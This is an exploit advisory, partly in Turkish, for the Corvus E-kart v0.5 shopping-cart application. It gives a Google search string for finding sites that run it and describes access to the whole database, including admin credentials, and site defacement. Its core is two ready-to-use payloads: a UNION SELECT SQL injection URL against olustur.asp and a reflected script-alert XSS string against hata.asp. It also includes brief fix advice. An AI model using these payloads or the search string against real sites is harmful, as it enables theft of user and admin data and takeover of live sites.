< ------------------- header data start ------------------- >

#############################################################

# Application Name : Corvus E-kart v0.5

# Vulnerable Type : SQL Injection & Cross Site Scripting

# Google Keyword : intitle:Corvus e-kart

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

Ayrica Yönetici ve User verileri çekilebilir.

# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id)). Cross Site Scripting vuln. kapamak için de zararli karakterler filtrelenmelidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

SQL Inj.

/olustur.asp?katid=4&resid=-1+union+select+0,1,2,3,4,5+from+gonderilen

XSS

/hata.asp?hata=><script>alert(xss)</script>

< -- bug code end of -- >